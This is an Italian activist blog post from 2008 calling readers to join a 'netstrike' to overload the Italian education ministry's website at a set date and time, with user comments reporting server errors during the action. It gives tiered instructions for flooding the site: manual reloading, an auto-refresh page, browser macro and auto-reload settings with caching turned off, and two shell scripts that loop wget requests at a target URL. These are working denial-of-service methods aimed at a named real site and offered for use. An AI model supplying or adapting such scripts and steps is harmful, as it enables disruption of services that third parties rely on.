Netstrike NoGelmini 13-11-2008 Ore 14:00


CALL 4 ACTION!!
!Blocchiamo il sito del ministero dell’istruzione!

Rilanciamo questa pregevole iniziativa ospitata dagli amici di Autistici/Inventati:

http://www.autistici.org/133strike/

Il Netstrike è l’equivalente cibernetico di un corteo partecipato, di un sit-in o di un blocco metropolitano, come quelli di cui è stato protagonista il movimento nelle ultime settimane ( 1 e 2 ): una pratica telematica coordinata da uno o più utenti i quali, moltiplicando le connessioni ad un sito (ad esempio connettendosi contemporaneamente ad esso) ne rallentano le attività, eventualmente causandone la paralisi. Fu lanciato per la prima volta nel 1995 dagli attivisti di European Counter Network contro i siti del governo francese -contro la decisione di quest’ultimo di procedere a test nucleari sull’atollo di Mururoa, nell’Oceano Pacifico- e da allora impiegato in svariate altre occasioni. 

Questa forma di protesta in rete viene ora ripresa dal movimento NoGelmini: giovedì 13/11/2008 alle ore 14:00 la banda del  Sito del Ministero dell’Università e della Ricerca verrà risucchiata nel gorgo dell’Onda. Ce n’è per tutti i livelli di abilità: fatevi sotto e buon netstrike a tutt*:)

Qua sotto mirroriamo dal sito http://www.autistici.org/133strike/ le varie modalità con cui mettere in atto il netstrike per bloccare il sito del ministero dell’istruzione. Leggete attentamente.


Il 13 Novembre alle ore 14:00 partecipa al Netstrike contro uno dei siti che rappresenta
coloro che vogliono sottrarci il nostro futuro, distruggere l’università pubblica e laica.

Cosa devi fare? Organizzati per avere un accesso ad internet intorno alle 14:00 del 13 novembre, per visitare il sito www.miur.it.
Scegli una delle seguenti modalità di partecipazione, calibrate in base alla difficoltà tecnica e il tempo
richiesto:

  • Easy/Low

    Ingredienti: un browser e 5 minuti del tuo tempo, accessibile praticamente a chiunque sappia usare un mouse 😀 

Apri il tuo browser ( Va bene uno qualunque come ad esempio: Firefox, Internet Explorer, Opera, Safari, ecc). Poi scegli se:
*ricaricare la pagina principale, premendo il tasto F5 (oppure CTRL+R), piu volte
*navigare per alcuni minuti all’interno del sito
*Usare la nostra pagina automatica, che si ricarica da sola ogni 5 secondi lasciandoti il tempo per bere un buon the’ 😀

  • Medium/Intermediate

Ingredienti: Utilizzare come browser firefox oppure opera. 

Se non hai ancora il browser Firefox scaricalo gratuitamente e installalo. Poi segui questi passi

*Vai qui e installa il plugin "iMacros", devi solo premere su "aggiungi a firefox". Segui le istruzioni che compariranno e riavvia firefox.

*Al riavvio di firefox apri il sito http://www.miur.it

*Ora dopo aver riavviato vedrai una barra laterale (altrimenti vai su Visualizza->Barra Laterale->iMacros)

*Premi su Reg e clicca Registra

*Ora iMacros sta registrando cosa fai dentro firefox, premi refresh 4-5 volte, aspettando tutte le volte che la pagina si sia caricata completamente

*Premi su Eseguire, inserisci un valore a piacimento (es. 100) nel campo Max, clicca su Esegui(Loop)

*iMacros eseguirà un loop di refresh lasciandoti libero di fare quello che vuoi nel mentre 😀

Per Opera

Se non hai ancora il browser Opera scaricalo gratuitamente e installalo. Poi segui questi passi

*Apri il sito www.miur.it

*Al termine del caricamento, fai clic con il tasto destro nell’area della pagina

*Scegli il menu Aggiorna ogni e seleziona la voce Personalizza, vedrai una nuova piccola finestra

*Controlla che l’opzione "Abilita" sia spuntata, poi imposta il valore 0 nel campo minuti e un numero basso (tra 1 e 5) nel campo Secondi

*Per ottenere un risultato migliore, disabilita la cache di opera: apri la finestra Preferenze e nel pannello dell’opzione Sicurezza imposta a off i valori di Cache di memoria e Cache di disco

  • High/Hard

Ingredienti: Sai cos’è wget? allora questa è la sezione fatta apposta per te

Se hai qualche conoscenza tecnica puoi provare ad usare uno di questi script o programmi

Script 1

Per Linux/Unix. richiede l’uso di wget

#!/bin/sh
#grazie ciaccomo 🙂
i=0
while [ true ]
do
        i=`expr $i + 1`
        echo downloaded $i times
        wget -O /dev/null $1 &> /dev/null
        sleep $2
done

Script 2

#!/bin/bash

function help() {
    echo -ne "n$(basename $0) [ -r RATE[k|m]] [ -d SLEEP ] [ -s START ] [ -k
STOP ] URL [URL …]"
    echo -ne "n- RATE, banda in bytes, kbytes o megabytes (def. 3k)."
    echo -ne "n- SLEEP, time di refresh (def. 1 sec)."
    echo -ne "n- START, data inizio netstrike (def. now)."
    echo -ne "n- STOP, data di fine netstrike (def. now + 5
min)."
    echo -ne "n- URL elenco delle pagine da aprire =] nn"
    exit $2
}

#def value
RATE="–limit-rate=3k"
DELAY=1
NOW=$(date ‘+%s’)
START=$NOW
STOP=$(($NOW + 300))
ARG=OK

[ -z "$1" ] && help 1

while [ ! -z "$ARG" ]
do
    ARG="$1";
    VALUE="$2";
    case "$ARG" in
        -h|–help)
            help 1
        ;;
        -r|–rate)
            RATE="–limit-rate=$VALUE"
            shift
        ;;
        -d|–delay)
            DELAY="$VALUE"
            shift
        ;;
        -s|–start)
            START=$(date -d "$VALUE" ‘+%s’)
            shift
        ;;
        -k|–stop)
            STOP=$(date -d "$VALUE" ‘+%s’)
            shift
        ;;
        *)
            URLS="$URLS $ARG"
        ;;
    esac
    shift
done

echo "netstrike:"
echo $URLS | tr " " "n"
echo "From " $(date -d "01/01/1970 +1 hours $START sec" ‘+%d/%m/%Y %H:%M:%S’)
echo "To   " $(date -d "01/01/1970 +1 hours $STOP sec" ‘+%d/%m/%Y %H:%M:%S’)
echo "limite di banda ${RATE##–limit-rate=}bit/sec"
echo "aspetto $DELAY seconds al prox refresh"
echo ""

if [ $START -gt $NOW ]
then
    echo "attendo…"
    sleep $(($START – $NOW))
fi

echo "Netstrike avviato."
while [ $NOW -lt $STOP ]
do
    for URL in $URLS
    do
        wget $RATE –no-http-keep-alive –cache=off –output-document=-
                   –quiet $URL > /dev/null
    done
    echo -ne "."
    sleep $DELAY
    NOW=$(date ‘+%s’)
done
echo "."
    

 

 

  1. #1 di akd il Novembre 13, 2008 - 5:46 pm

    ora usando l’auto ti reindirizza e ti blocca!

  2. #2 di bug il Novembre 13, 2008 - 5:45 pm

    Hanno aggiunto un altra macchina ancora

    193.206.6.93,194.242.241.85,193.206.6.24

  3. #3 di insetto il Novembre 13, 2008 - 4:50 pm

    Hanno aggiunto un’altra macchina per non far cedere il sito.

    Prima l’ip era solo

    193.206.6.24

    ora c’è pure il

    193.206.6.93

  4. #4 di netstriker* il Novembre 13, 2008 - 4:26 pm

    http://www.miur.it/default.html

    HTTP/1.1 500 Server Error

    Lo sta dando in continuazione!!

    Daiiiii

  5. #5 di precario afam il Novembre 13, 2008 - 4:26 pm

    io sto usando sia la pagina automatica che gli script,una domanda?
    meglio il primo o il secondo?perdonate la gnuranza!!!

  6. #6 di precario afam il Novembre 13, 2008 - 4:19 pm

    a oltranza, cmq da miur.it si entra tranquilli

  7. #7 di Ulyxes il Novembre 13, 2008 - 4:05 pm

    Finche non lo blocchiamo!!
    Proviamo ancora almeno fino alle 18.
    dalla pagina http://www.autistici.org/133strike/auto.html

    Continua a venire in modo intermittente l’errore 500

    Proviamo e vediamo

  8. #8 di precario afam il Novembre 13, 2008 - 3:51 pm

    è stato molto rallentato,ma fino a che ora si prosegue?

  9. #9 di nessuno il Novembre 13, 2008 - 3:49 pm

    Non lo so. Mi sembra un pò presto per dirlo. Per ora è solamente rallentanto anche se ogni tanto da errore 500

  10. #10 di akd il Novembre 13, 2008 - 3:03 pm

    Sta riuscendo!!!!!!!!

    o sbaglio?

(non verrà pubblicata)